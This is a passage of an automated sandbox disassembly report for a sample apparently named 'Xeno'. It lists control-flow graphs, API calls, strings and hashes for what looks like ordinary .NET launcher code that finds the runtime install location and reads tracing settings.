7ff68d5eca4d-7ff68d5eca68 call 7ff68d5e7670 RegCloseKey 1758->1763 1764 7ff68d5eca6a-7ff68d5eca84 call 7ff68d5e8e70 RegCloseKey 1758->1764 1767 7ff68d5ec9f2-7ff68d5ec9fa call 7ff68d5f0d08 1760->1767 1768 7ff68d5ec9c9-7ff68d5ec9d0 1760->1768 1766 7ff68d5ec9fd-7ff68d5eca1a call 7ff68d5f58a0 1761->1766 1769 7ff68d5ecaf7-7ff68d5ecaff 1762->1769 1792 7ff68d5eca9b-7ff68d5eca9e 1763->1792 1793 7ff68d5eca89-7ff68d5eca98 call 7ff68d5e7670 1764->1793 1794 7ff68d5eca86 1764->1794 1771 7ff68d5ec8d4-7ff68d5ec8e7 1765->1771 1772 7ff68d5ec8f0 call 7ff68d5f0d00 1765->1772 1766->1758 1767->1766 1774 7ff68d5ecb61-7ff68d5ecb67 call 7ff68d5e13c0 1768->1774 1775 7ff68d5ec9d6-7ff68d5ec9de call 7ff68d5f0d08 1768->1775 1776 7ff68d5ecb01-7ff68d5ecb17 1769->1776 1777 7ff68d5ecb3a-7ff68d5ecb60 call 7ff68d5f0ce0 1769->1777 1771->1772 1782 7ff68d5ec8e9-7ff68d5ec8ef _invalid_parameter_noinfo_noreturn 1771->1782 1772->1737 1799 7ff68d5ec9e4-7ff68d5ec9f0 1775->1799 1800 7ff68d5ecacb-7ff68d5ecad1 _invalid_parameter_noinfo_noreturn 1775->1800 1786 7ff68d5ecb35 call 7ff68d5f0d00 1776->1786 1787 7ff68d5ecb19-7ff68d5ecb2c 1776->1787 1782->1772 1786->1777 1787->1786 1796 7ff68d5ecb2e-7ff68d5ecb34 _invalid_parameter_noinfo_noreturn 1787->1796 1792->1769 1802 7ff68d5ecaa0-7ff68d5ecab4 1792->1802 1793->1792 1794->1793 1796->1786 1799->1766 1804 7ff68d5ecad2-7ff68d5ecada call 7ff68d5f0d00 1800->1804 1802->1804 1805 7ff68d5ecab6-7ff68d5ecac9 1802->1805 1804->1769 1805->1800 1805->1804
                                                                                      APIs
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EC8E9
                                                                                      • RegOpenKeyExW.ADVAPI32 ref: 00007FF68D5EC91D
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5ECB2E
                                                                                        • Part of subcall function 00007FF68D5E7670: __stdio_common_vfwprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E76F4
                                                                                        • Part of subcall function 00007FF68D5E7670: fputwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7702
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5ECB61
                                                                                      Strings
                                                                                      • Failed to get the value of the install location registry value. Error code: 0x%X, xrefs: 00007FF68D5ECA4F
                                                                                      • The registry key ['%s'] does not exist., xrefs: 00007FF68D5EC93A
                                                                                      • Failed to get the size of the install location registry value or it's empty. Error code: 0x%X, xrefs: 00007FF68D5ECADE
                                                                                      • Failed to open the registry key. Error code: 0x%X, xrefs: 00007FF68D5EC94D
                                                                                      • Looking for architecture-specific registry value in '%s'., xrefs: 00007FF68D5EC8A6
                                                                                      • Found registered install location '%s'., xrefs: 00007FF68D5ECA8C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskOpen__stdio_common_vfwprintffputwc
                                                                                      • String ID: Failed to get the size of the install location registry value or it's empty. Error code: 0x%X$Failed to get the value of the install location registry value. Error code: 0x%X$Failed to open the registry key. Error code: 0x%X$Found registered install location '%s'.$Looking for architecture-specific registry value in '%s'.$The registry key ['%s'] does not exist.
                                                                                      • API String ID: 1529167557-2871418594
                                                                                      • Opcode ID: 1f61457efec5fa3999b0a2cdbe63c0f8d4e5ce3f8421ac04e01c4fe06ab1c5f8
                                                                                      • Instruction ID: bf1ce853c4e69f4c8a434543036b2ab83bc475a709e8fc4bc66a7557fea73b28
                                                                                      • Opcode Fuzzy Hash: 1f61457efec5fa3999b0a2cdbe63c0f8d4e5ce3f8421ac04e01c4fe06ab1c5f8
                                                                                      • Instruction Fuzzy Hash: 8AA1CF62F08A42C5FB10EF65E4502BD2361FF44BA8F40023BDE5D96A98EE7CE449C361

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Free_invalid_parameter_noinfo_noreturn$AddressConcurrency::cancel_current_taskExecuteFindHandleLoadModuleProcResourceShell
                                                                                      • String ID: Download link:$ $Download it nowYou will need to run the downloaded installer$Learn more:$TaskDialogIndirect$comctl32.dll$https://aka.ms/dotnet/app-launch-failed
                                                                                      • API String ID: 1361828802-427846389
                                                                                      • Opcode ID: 1590cb7845b3659021b245ac932d2ab975ea9fbd28bdfadfe0b2b03f413ea0ed
                                                                                      • Instruction ID: 08a4a5be80070acf229136e577ea5c062faaea8cb64d17ee033ad2c1dd70d1ca
                                                                                      • Opcode Fuzzy Hash: 1590cb7845b3659021b245ac932d2ab975ea9fbd28bdfadfe0b2b03f413ea0ed
                                                                                      • Instruction Fuzzy Hash: 8B815B22B18A41D9EB10DB61E8443AD63A0FF44B94F40453AEE5D87B98EF7CE548C751
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressLibraryLoadProc
                                                                                      • String ID: RtlGetVersion$ntdll.dll$win$win7$win8$win81
                                                                                      • API String ID: 2574300362-238241336
                                                                                      • Opcode ID: 20cdc6eb3754abdff701dc275fb3fa083e44d4ca6bce219e8b14929a77ff052f
                                                                                      • Instruction ID: 48325338c16a27c71176eec09024e17e77c9014c41ce8697b5157754bb32f361
                                                                                      • Opcode Fuzzy Hash: 20cdc6eb3754abdff701dc275fb3fa083e44d4ca6bce219e8b14929a77ff052f
                                                                                      • Instruction Fuzzy Hash: EF419031E18642C5EA20AB14E4502796352FF89B90F90413BDD6CC7695FF7CE548D762
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3140674995-0
                                                                                      • Opcode ID: a38391418472e8c90f953caece25de29ff60e92270976825603c186ce6f84f77
                                                                                      • Instruction ID: 8239a07b65b22ae68089fb4acc026e0391507f25002f0fabe54741ae4c395dc8
                                                                                      • Opcode Fuzzy Hash: a38391418472e8c90f953caece25de29ff60e92270976825603c186ce6f84f77
                                                                                      • Instruction Fuzzy Hash: F2311A72608B81C6EB609F60E8407EE7364FB84744F44443ADA4E8BB94EF78D64CC721

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1852 7ff68d5e6fe0-7ff68d5e7043 GetEnvironmentVariableW 1853 7ff68d5e7045-7ff68d5e7050 GetLastError 1852->1853 1854 7ff68d5e707d-7ff68d5e70b0 call 7ff68d5f0fbc GetEnvironmentVariableW 1852->1854 1856 7ff68d5e721e-7ff68d5e7227 1853->1856 1857 7ff68d5e7056-7ff68d5e7058 1853->1857 1854->1853 1866 7ff68d5e70b2 1854->1866 1860 7ff68d5e7263-7ff68d5e728b call 7ff68d5f0ce0 1856->1860 1861 7ff68d5e7229-7ff68d5e7240 1856->1861 1858 7ff68d5e7062-7ff68d5e7078 call 7ff68d5e7a60 1857->1858 1859 7ff68d5e705a-7ff68d5e705d 1857->1859 1858->1856 1859->1858 1864 7ff68d5e7242-7ff68d5e7255 1861->1864 1865 7ff68d5e725e call 7ff68d5f0d00 1861->1865 1864->1865 1869 7ff68d5e7257-7ff68d5e725d _invalid_parameter_noinfo_noreturn 1864->1869 1865->1860 1871 7ff68d5e70b5-7ff68d5e70be 1866->1871 1869->1865 1871->1871 1873 7ff68d5e70c0-7ff68d5e70c8 1871->1873 1874 7ff68d5e70ca-7ff68d5e70f5 call 7ff68d5f5200 1873->1874 1875 7ff68d5e70f7-7ff68d5e70ff call 7ff68d5e6600 1873->1875 1879 7ff68d5e7104-7ff68d5e7125 call 7ff68d5f0d00 _wtoi 1874->1879 1875->1879 1879->1856 1882 7ff68d5e712b-7ff68d5e7132 call 7ff68d5e7290 1879->1882 1882->1856 1885 7ff68d5e7138-7ff68d5e7198 _time64 _gmtime64_s wcsftime 1882->1885 1886 7ff68d5e71a0-7ff68d5e71a8 1885->1886 1886->1886 1887 7ff68d5e71aa-7ff68d5e71e1 call 7ff68d5e6070 call 7ff68d5e7720 1886->1887 1887->1856 1892 7ff68d5e71e3-7ff68d5e71fa 1887->1892 1893 7ff68d5e71fc-7ff68d5e720f 1892->1893 1894 7ff68d5e7218-7ff68d5e721d call 7ff68d5f0d00 1892->1894 1893->1894 1896 7ff68d5e7211-7ff68d5e7217 _invalid_parameter_noinfo_noreturn 1893->1896 1894->1856 1896->1894
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentVariable_invalid_parameter_noinfo_noreturn$ErrorLast_gmtime64_s_time64_wtoiwcsftime
                                                                                      • String ID: %c GMT$COREHOST_TRACE$Failed to read environment variable [%s], HRESULT: 0x%X$Tracing enabled @ %s
                                                                                      • API String ID: 29591814-1875902258
                                                                                      • Opcode ID: a008973eed72be1559eaaec080d773f3390b42f5d001d5943a734892eda6fa95
                                                                                      • Instruction ID: fc161f1381cd2317dac7eba538fbf24facfddbc8ba10fc0fd5124184a5f8b19a
                                                                                      • Opcode Fuzzy Hash: a008973eed72be1559eaaec080d773f3390b42f5d001d5943a734892eda6fa95
                                                                                      • Instruction Fuzzy Hash: 4871BC62A18B42D1EB10DB25E44026E6361FF84BD4F50423BED5D876A8FF7CE589C711

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1898 7ff68d5e1b70-7ff68d5e1b96 1899 7ff68d5e1cff-7ff68d5e1d1b 1898->1899 1900 7ff68d5e1b9c-7ff68d5e1b9f 1898->1900 1900->1899 1901 7ff68d5e1ba5 1900->1901 1902 7ff68d5e1baa call 7ff68d5f0d08 1901->1902 1903 7ff68d5e1baf-7ff68d5e1bbd 1902->1903 1904 7ff68d5e1bbf-7ff68d5e1bc6 1903->1904 1905 7ff68d5e1bce 1903->1905 1906 7ff68d5e1bd5-7ff68d5e1c16 call 7ff68d5eff1c 1904->1906 1907 7ff68d5e1bc8-7ff68d5e1bcc 1904->1907 1905->1906 1910 7ff68d5e1d1c-7ff68d5e1d51 call 7ff68d5f0284 call 7ff68d5f084c 1906->1910 1911 7ff68d5e1c1c-7ff68d5e1c8a call 7ff68d5f05bc call 7ff68d5f091c call 7ff68d5f09dc call 7ff68d5f0628 1906->1911 1907->1906 1924 7ff68d5e1c92-7ff68d5e1c9d 1911->1924 1925 7ff68d5e1c8c free 1911->1925 1926 7ff68d5e1ca5-7ff68d5e1cb0 1924->1926 1927 7ff68d5e1c9f free 1924->1927 1925->1924 1928 7ff68d5e1cb2 free 1926->1928 1929 7ff68d5e1cb8-7ff68d5e1cc3 1926->1929 1927->1926 1928->1929 1930 7ff68d5e1cc5 free 1929->1930 1931 7ff68d5e1ccb-7ff68d5e1cd6 1929->1931 1930->1931 1932 7ff68d5e1cde-7ff68d5e1ce9 1931->1932 1933 7ff68d5e1cd8 free 1931->1933 1934 7ff68d5e1cf1-7ff68d5e1cfe call 7ff68d5eff94 1932->1934 1935 7ff68d5e1ceb free 1932->1935 1933->1932 1934->1899 1935->1934
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_malloc
                                                                                      • String ID: bad locale name
                                                                                      • API String ID: 3869375685-1405518554
                                                                                      • Opcode ID: 0c98c05a6d440e719c0856b4f51288344e191d52904679a6af0c60a2d54902c9
                                                                                      • Instruction ID: d1861b897e8e6581fb91a36cf80a7e04f2aa0dfe7782191eb53284aa5262d1b0
                                                                                      • Opcode Fuzzy Hash: 0c98c05a6d440e719c0856b4f51288344e191d52904679a6af0c60a2d54902c9
                                                                                      • Instruction Fuzzy Hash: EF517922B09B41CAFB54DBA0D4506BC3374FF54748F08413ADE4DAAA55EF38E55AD321

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1938 7ff68d5ebb10-7ff68d5ebb5a 1939 7ff68d5ebbac-7ff68d5ebbc7 GetCurrentProcess IsWow64Process 1938->1939 1940 7ff68d5ebb5c-7ff68d5ebb7b GetEnvironmentVariableW 1938->1940 1943 7ff68d5ebbc9-7ff68d5ebbd5 1939->1943 1944 7ff68d5ebbd7 1939->1944 1941 7ff68d5ebbf5-7ff68d5ebc28 call 7ff68d5f0fbc GetEnvironmentVariableW 1940->1941 1942 7ff68d5ebb7d-7ff68d5ebb88 GetLastError 1940->1942 1941->1942 1952 7ff68d5ebc2e 1941->1952 1942->1939 1946 7ff68d5ebb8a-7ff68d5ebb8c 1942->1946 1943->1944 1947 7ff68d5ebbde-7ff68d5ebbe8 call 7ff68d5e8380 1943->1947 1944->1947 1949 7ff68d5ebb8e-7ff68d5ebb91 1946->1949 1950 7ff68d5ebb96-7ff68d5ebba7 call 7ff68d5e7a60 1946->1950 1955 7ff68d5ebce5-7ff68d5ebcfb call 7ff68d5e7dd0 call 7ff68d5ed920 1947->1955 1956 7ff68d5ebbee-7ff68d5ebbf0 1947->1956 1949->1950 1950->1939 1957 7ff68d5ebc30-7ff68d5ebc39 1952->1957 1979 7ff68d5ebd0c 1955->1979 1980 7ff68d5ebcfd-7ff68d5ebd07 call 7ff68d5e7dd0 1955->1980 1958 7ff68d5ebd0e-7ff68d5ebd17 1956->1958 1957->1957 1959 7ff68d5ebc3b-7ff68d5ebc43 1957->1959 1961 7ff68d5ebd53-7ff68d5ebd78 call 7ff68d5f0ce0 1958->1961 1962 7ff68d5ebd19-7ff68d5ebd30 1958->1962 1963 7ff68d5ebc45-7ff68d5ebc6f call 7ff68d5f5200 1959->1963 1964 7ff68d5ebc71-7ff68d5ebc7c call 7ff68d5e6600 1959->1964 1966 7ff68d5ebd32-7ff68d5ebd45 1962->1966 1967 7ff68d5ebd4e call 7ff68d5f0d00 1962->1967 1976 7ff68d5ebc81-7ff68d5ebc91 call 7ff68d5f0d00 1963->1976 1964->1976 1966->1967 1972 7ff68d5ebd47-7ff68d5ebd4d _invalid_parameter_noinfo_noreturn 1966->1972 1967->1961 1972->1967 1976->1979 1983 7ff68d5ebc93-7ff68d5ebcb0 1976->1983 1979->1958 1980->1979 1984 7ff68d5ebcb2-7ff68d5ebcb9 1983->1984 1985 7ff68d5ebcd8-7ff68d5ebce3 call 7ff68d5e6600 1983->1985 1986 7ff68d5ebcbe-7ff68d5ebcd6 call 7ff68d5f5200 1984->1986 1987 7ff68d5ebcbb 1984->1987 1985->1979 1986->1979 1987->1986
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentProcessVariable$CurrentErrorLastWow64_invalid_parameter_noinfo_noreturn
                                                                                      • String ID: Failed to read environment variable [%s], HRESULT: 0x%X$ProgramFiles$ProgramFiles(x86)$_DOTNET_TEST_DEFAULT_INSTALL_PATH$dotnet
                                                                                      • API String ID: 2226353477-3944960975
                                                                                      • Opcode ID: 72232a43526ab3dd8352fe22f4e28bccabbe42b48578a77dadcbc7b9ef9d0ca9
                                                                                      • Instruction ID: 1345de9db1ff8f3fe1a2bd946f92eaaba6b51c2068eff580893bb50b4816ed88
                                                                                      • Opcode Fuzzy Hash: 72232a43526ab3dd8352fe22f4e28bccabbe42b48578a77dadcbc7b9ef9d0ca9
                                                                                      • Instruction Fuzzy Hash: A3616261A08642C1EB20AF15E4402BA63A5FF44BD1F44023BDE5DCB6A9EF7CE549C762

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1992 7ff68d5e8a50-7ff68d5e8ac5 call 7ff68d5e6070 1995 7ff68d5e8af8-7ff68d5e8b10 call 7ff68d5e62b0 1992->1995 1996 7ff68d5e8ac7-7ff68d5e8ad6 1992->1996 2000 7ff68d5e8b15-7ff68d5e8b27 1995->2000 1998 7ff68d5e8adb-7ff68d5e8af6 call 7ff68d5f5200 1996->1998 1999 7ff68d5e8ad8 1996->1999 1998->2000 1999->1998 2003 7ff68d5e8b5a-7ff68d5e8b72 call 7ff68d5e62b0 2000->2003 2004 7ff68d5e8b29-7ff68d5e8b38 2000->2004 2009 7ff68d5e8b77-7ff68d5e8b98 call 7ff68d5e5500 2003->2009 2005 7ff68d5e8b3d-7ff68d5e8b58 call 7ff68d5f5200 2004->2005 2006 7ff68d5e8b3a 2004->2006 2005->2009 2006->2005 2013 7ff68d5e8b9a-7ff68d5e8ba9 2009->2013 2014 7ff68d5e8bcb-7ff68d5e8be3 call 7ff68d5e62b0 2009->2014 2016 7ff68d5e8bae-7ff68d5e8bc9 call 7ff68d5f5200 2013->2016 2017 7ff68d5e8bab 2013->2017 2019 7ff68d5e8be8-7ff68d5e8c06 call 7ff68d5e81b0 call 7ff68d5e5590 2014->2019 2016->2019 2017->2016 2025 7ff68d5e8c41 2019->2025 2026 7ff68d5e8c08-7ff68d5e8c1e 2019->2026 2027 7ff68d5e8c45 call 7ff68d5ecb70 2025->2027 2028 7ff68d5e8c20-7ff68d5e8c33 2026->2028 2029 7ff68d5e8c3c call 7ff68d5f0d00 2026->2029 2030 7ff68d5e8c4a-7ff68d5e8c50 2027->2030 2028->2029 2031 7ff68d5e8c35-7ff68d5e8c3b _invalid_parameter_noinfo_noreturn 2028->2031 2029->2025 2033 7ff68d5e8c52-7ff68d5e8c86 call 7ff68d5e6070 2030->2033 2034 7ff68d5e8cd1-7ff68d5e8ce3 2030->2034 2031->2029 2043 7ff68d5e8cc1-7ff68d5e8ccd 2033->2043 2044 7ff68d5e8c88-7ff68d5e8c9e 2033->2044 2036 7ff68d5e8ce5-7ff68d5e8cf4 2034->2036 2037 7ff68d5e8d0e-7ff68d5e8d26 call 7ff68d5e62b0 2034->2037 2040 7ff68d5e8cf9-7ff68d5e8d0c 2036->2040 2041 7ff68d5e8cf6 2036->2041 2042 7ff68d5e8d2b-7ff68d5e8d4e 2037->2042 2040->2042 2041->2040 2045 7ff68d5e8d50-7ff68d5e8d5f 2042->2045 2046 7ff68d5e8d7f-7ff68d5e8d8f call 7ff68d5e62b0 2042->2046 2043->2034 2047 7ff68d5e8ca0-7ff68d5e8cb3 2044->2047 2048 7ff68d5e8cbc call 7ff68d5f0d00 2044->2048 2049 7ff68d5e8d64-7ff68d5e8d7d call 7ff68d5f5200 2045->2049 2050 7ff68d5e8d61 2045->2050 2057 7ff68d5e8d90-7ff68d5e8d98 2046->2057 2047->2048 2051 7ff68d5e8cb5-7ff68d5e8cbb _invalid_parameter_noinfo_noreturn 2047->2051 2048->2043 2049->2057 2050->2049 2051->2048 2058 7ff68d5e8dd3-7ff68d5e8dfe call 7ff68d5f0ce0 2057->2058 2059 7ff68d5e8d9a-7ff68d5e8db0 2057->2059 2061 7ff68d5e8db2-7ff68d5e8dc5 2059->2061 2062 7ff68d5e8dce call 7ff68d5f0d00 2059->2062 2061->2062 2064 7ff68d5e8dc7-7ff68d5e8dcd _invalid_parameter_noinfo_noreturn 2061->2064 2062->2058 2064->2062
                                                                                      APIs
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00007FF68D5E3BE1), ref: 00007FF68D5E8C35
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00007FF68D5E3BE1), ref: 00007FF68D5E8CB5
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00007FF68D5E3BE1), ref: 00007FF68D5E8DC7
                                                                                        • Part of subcall function 00007FF68D5E62B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68D5E102D), ref: 00007FF68D5E640F
                                                                                        • Part of subcall function 00007FF68D5E62B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E645D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                      • String ID: &arch=$&os=$&rid=$https://aka.ms/dotnet-core-applaunch?$missing_runtime=true$win10$x64
                                                                                      • API String ID: 3936042273-2126368634
                                                                                      • Opcode ID: c4cc6ff32b69a53a8f7845ac237a2d8c364f35f14854b6096570883cc5d25366
                                                                                      • Instruction ID: e70107125f6c0e7768bf2cb5b6e50b1949d63293a578e69745431c1a3ddf02ea
                                                                                      • Opcode Fuzzy Hash: c4cc6ff32b69a53a8f7845ac237a2d8c364f35f14854b6096570883cc5d25366
                                                                                      • Instruction Fuzzy Hash: 44B18BA2B14B45D1EB10EF25D5003AD2361FB84B98F80563BDE5D87B98EF78E158C351
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32 ref: 00007FF68D5EED48
                                                                                      • MultiByteToWideChar.KERNEL32 ref: 00007FF68D5EED8B
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEEC8
                                                                                        • Part of subcall function 00007FF68D5E77D0: __stdio_common_vswprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7821
                                                                                        • Part of subcall function 00007FF68D5E77D0: __stdio_common_vsnwprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E78F1
                                                                                        • Part of subcall function 00007FF68D5E77D0: OutputDebugStringW.KERNEL32 ref: 00007FF68D5E78FA
                                                                                        • Part of subcall function 00007FF68D5E77D0: SwitchToThread.KERNEL32 ref: 00007FF68D5E792B
                                                                                        • Part of subcall function 00007FF68D5E77D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E795D
                                                                                        • Part of subcall function 00007FF68D5E77D0: fputws.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E796E
                                                                                        • Part of subcall function 00007FF68D5E77D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7979
                                                                                        • Part of subcall function 00007FF68D5E77D0: fputwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7987
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
